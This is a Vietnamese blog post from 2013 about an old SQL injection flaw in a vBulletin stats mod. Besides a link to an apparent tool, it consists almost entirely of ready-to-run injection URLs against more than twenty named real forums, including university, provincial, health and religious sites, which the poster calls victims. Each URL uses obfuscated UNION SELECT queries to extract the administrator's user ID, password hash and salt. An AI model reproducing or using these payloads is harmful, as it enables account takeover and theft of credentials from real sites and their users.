Thứ Hai, 7 tháng 1, 2013

Check sqlinjection vbulletin mod chang stats

Lỗi cổ rồi viết lại cho ai chưa biết
http://www.mediafire.com/?rsbbczaf00abqtf

Có thể xem thêm victim sau
http://www.bacgiangonline.net/diendan/ajax.php?do=allforum&result=20

Forum teen Tỉnh Bắc Giang :http://www.bacgiangonline.net/diendan/ajax.php?do=inforum&listforumid=-20)+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws(0x2f,userid,password,salt),7,8,9,10 from user where userid =1-- -&result=20

Khoa tài chính - Kế tóan -Đại học sài gòn :http://fafsgu.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Khoa công trình thủy -Đại học hàng hải :http://ctt.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20Khoa tài chính ngân hàng-đại học thương mại: http://www.tcnh-dhtm.org/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học kỹ thuật công nghiệp :http://k43tdh2.com/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học lao động xã hội: http://wwwulsa.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học thành đô Hà Nội:http://svthanhdo.com/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn đàn Kinh Môn http://kinhmon24h.com/4rum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Game gủng gì đó mới ra :http://forum.tinhvankiem.net/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20Cộng đồng cao học Kinh Tế VN:http://caohockinhte.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn đàn kĩ sư Môi Trường VN:http://kysumoitruong.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Diễn đàn sức khỏe :http://forum.suckhoeconnguoi.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Khoa Kỹ Thuật Công Nghiệp -Đại Học Thái Nguyên:http://khoaktcn.tntec.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Diễn Đàn cao đẳng nghê Quốc Tế Nam Việt:http://www.namviet.edu.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Cao Đẳng sư phạm Hà Giang :http://cdsphagiang.edu.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Forum Tỉnh Đồng Nai :http://forum.dongnai.org/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn Đàn Kĩ Sư Kết Cấu Việt Nam:http://www.ketcau.com/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20%27


Diễn Đàn Tôn Giáo Đạo Mẫu :http://hatvan.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20

Forum Thể Thao:http://vietsport.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Cao Đẳng Kỹ Thuật Thái Nguyên:http://fandore.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Tạp chí Hóa Học :http://www.hoahoc.org/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Đại Học Kĩ Thuật Công Nghệ http://dhktcn.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Khoa công nghệ thông tin-Viện mở Hà Nội  http://forum.sinhvienfithou.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Không có nhận xét nào:

Đăng nhận xét